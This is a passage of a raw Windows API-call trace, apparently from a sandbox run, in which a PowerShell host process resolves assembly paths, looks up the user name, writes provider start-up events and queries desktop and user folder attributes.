lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.450] CoTaskMemAlloc (cb=0x804) returned 0x1b990db0 [0064.450] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b990db0, nSize=0x24d6c8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x24d6c8) returned 0x1 [0064.450] CoTaskMemFree (pv=0x1b990db0) [0064.450] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0064.450] GetUserNameW (in: lpBuffer=0xe7050, pcbBuffer=0x24d708 | out: lpBuffer="aETAdzjz", pcbBuffer=0x24d708) returned 1 [0064.450] CoTaskMemFree (pv=0xe7050) [0064.451] ReportEventW (hEventLog=0x1ba60008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f98518*="Registry", lpRawData=0x2f982a8) returned 1 [0064.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.454] CoTaskMemAlloc (cb=0x804) returned 0x1b990db0 [0064.454] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b990db0, nSize=0x24d6c8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x24d6c8) returned 0x1 [0064.454] CoTaskMemFree (pv=0x1b990db0) [0064.454] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0064.454] GetUserNameW (in: lpBuffer=0xe7050, pcbBuffer=0x24d708 | out: lpBuffer="aETAdzjz", pcbBuffer=0x24d708) returned 1 [0064.454] CoTaskMemFree (pv=0xe7050) [0064.455] ReportEventW (hEventLog=0x1ba60008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f9d8e0*="Variable", lpRawData=0x2f9d670) returned 1 [0064.456] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0064.456] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0064.456] CoTaskMemFree (pv=0x1b96d1e0) [0064.535] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0064.535] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0064.535] CoTaskMemFree (pv=0x1b96d1e0) [0064.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0064.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0064.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0064.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0064.763] CoTaskMemAlloc (cb=0x804) returned 0x1b990db0 [0064.763] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b990db0, nSize=0x24d6c8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x24d6c8) returned 0x1 [0064.763] CoTaskMemFree (pv=0x1b990db0) [0064.763] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0064.763] GetUserNameW (in: lpBuffer=0xe7050, pcbBuffer=0x24d708 | out: lpBuffer="aETAdzjz", pcbBuffer=0x24d708) returned 1 [0064.764] CoTaskMemFree (pv=0xe7050) [0064.764] ReportEventW (hEventLog=0x1ba60008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fb14a8*="Certificate", lpRawData=0x2fb1238) returned 1 [0064.865] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0064.865] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0064.866] CoTaskMemFree (pv=0x1b96d1e0) [0064.874] GetLogicalDrives () returned 0x4 [0064.874] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24d350, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0064.874] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0064.875] CoTaskMemAlloc (cb=0x20e) returned 0xf2b80 [0064.875] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0xf2b80 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0064.875] CoTaskMemFree (pv=0xf2b80) [0064.877] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0064.877] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0064.877] CoTaskMemFree (pv=0x1b96d1e0) [0064.877] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0064.877] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0064.877] CoTaskMemFree (pv=0x1b96d1e0) [0064.988] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0064.988] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0064.989] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0064.989] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0064.990] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x24d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0064.990] SetErrorMode (uMode=0x1) returned 0x1 [0064.990] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x24d310 | out: lpFileInformation=0x24d310*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xc1fb1810, ftLastAccessTime.dwHighDateTime=0x1d4be3a, ftLastWriteTime.dwLowDateTime=0xc1fb1810, ftLastWriteTime.dwHighDateTime=0x1d4be3a, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0064.990] SetErrorMode (uMode=0x1) returned 0x1 [0064.990] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x24d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0064.990] SetErrorMode (uMode=0x1) returned 0x1 [0064.990] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x24d310 | out: lpFileInformation=0x24d310*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xc1fb1810, ftLastAccessTime.dwHighDateTime=0x1d4be3a, ftLastWriteTime.dwLowDateTime=0xc1fb1810, ftLastWriteTime.dwHighDateTime=0x1d4be3a, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0064.990] SetErrorMode (uMode=0x1) returned 0x1 [0064.991] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0064.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0064.996] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x24d250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0064.996] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0064.996] SetErrorMode (uMode=0x1) returned 0x1 [0064.996] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d2d0 | out: lpFileInformation=0x24d2d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0064.997] SetErrorMode (uMode=0x1) returned 0x1 [0064.997] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0064.997] SetErrorMode (uMode=0x1) returned 0x1 [0064.997] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d2d0 | out: lpFileInformation=0x24d2d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0064.997] SetErrorMode (uMode=0x1) returned 0x1 [0064.997] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0064.997] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0064.997] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x24d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0064.997] SetErrorMode (uMode=0x1) returned 0x1 [0064.997] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x24d2d0 | out: lpFileInformation=0x24d2d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0064.998] SetErrorMode (uMode=0x1) returned 0x1 [0064.998] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x24d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0064.998] SetErrorMode (uMode=0x1) returned 0x1 [0064.998] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x24d2d0 | out: lpFileInformation=0x24d2d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0064.998] SetErrorMode (uMode=0x1) returned 0x1 [0064.998] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x24d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0064.998] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x24cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0064.998] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x24d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0064.998] SetErrorMode (uMode=0x1) returned 0x1 [0064.998] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x24d2d0 | out: lpFileInformation=0x24d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0064.998] SetErrorMode (uMode=0x1) returned 0x1 [0064.999] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x24d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0064.999] SetErrorMode (uMode=0x1) returned 0x1 [0064.999] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x24d2d0 | out: lpFileInformation=0x24d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0064.999] SetErrorMode (uMode=0x1) returned 0x1 [0064.999] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x24d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0064.999] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x24cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0065.000] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x24d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0065.000] SetErrorMode (uMode=0x1) returned 0x1 [0065.000] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x24d2d0 | out: lpFileInformation=0x24d2d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xc1fb1810, ftLastAccessTime.dwHighDateTime=0x1d4be3a, ftLastWriteTime.dwLowDateTime=0xc1fb1810, ftLastWriteTime.dwHighDateTime=0x1d4be3a, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0065.001] SetErrorMode (uMode=0x1) returned 0x1 [0065.001] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x24d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0065.001] SetErrorMode (uMode=0x1) returned 0x1 [0065.001] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x24d2d0 | out: lpFileInformation=0x24d2d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xc1fb1810, ftLastAccessTime.dwHighDateTime=0x1d4be3a, ftLastWriteTime.dwLowDateTime=0xc1fb1810, ftLastWriteTime.dwHighDateTime=0x1d4be3a, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0065.001] SetErrorMode (uMode=0x1) returned 0x1 [0065.001] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x24d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0065.001] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x24cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0065.001] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x24d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0065.002] SetErrorMode (uMode=0x1) returned 0x1 [0065.002] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x24d310 | out: lpFileInformation=0x24d310*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0065.002] SetErrorMode (uMode=0x1) returned 0x1 [0065.002] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x24d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0065.002] SetErrorMode (uMode=0x1) returned 0x1 [0065.002] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x24d310 | out: lpFileInformation=0x24d310*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0065.002] SetErrorMode (uMode=0x1) returned 0x1 [0065.002] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0065.002] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x24d000, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0065.002] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x24d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0065.002] SetErrorMode (uMode=0x1) returned 0x1 [0065.003] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x24d310 | out: lpFileInformation=0x24d310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0065.003] SetErrorMode (uMode=0x1) returned 0x1 [0065.003] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x24d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0065.003] SetErrorMode (uMode=0x1) returned 0x1 [0065.003] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x24d310 | out: lpFileInformation=0x24d310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0065.003] SetErrorMode (uMode=0x1) returned 0x1 [0065.003] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0065.003] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x24d000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0065.003] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x24d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0065.003] SetErrorMode (uMode=0x1) returned 0x1 [0065.003] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x24d310 | out: lpFileInformation=0x24d310*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xc1fb1810, ftLastAccessTime.dwHighDateTime=0x1d4be3a, ftLastWriteTime.dwLowDateTime=0xc1fb1810, ftLastWriteTime.dwHighDateTime=0x1d4be3a, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0065.004] SetErrorMode (uMode=0x1) returned 0x1 [0065.004] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x24d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0065.004] SetErrorMode (uMode=0x1) returned 0x1 [0065.004] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x24d310 | out: lpFileInformation=0x24d310*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xc1fb1810, ftLastAccessTime.dwHighDateTime=0x1d4be3a, ftLastWriteTime.dwLowDateTime=0xc1fb1810, ftLastWriteTime.dwHighDateTime=0x1d4be3a, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 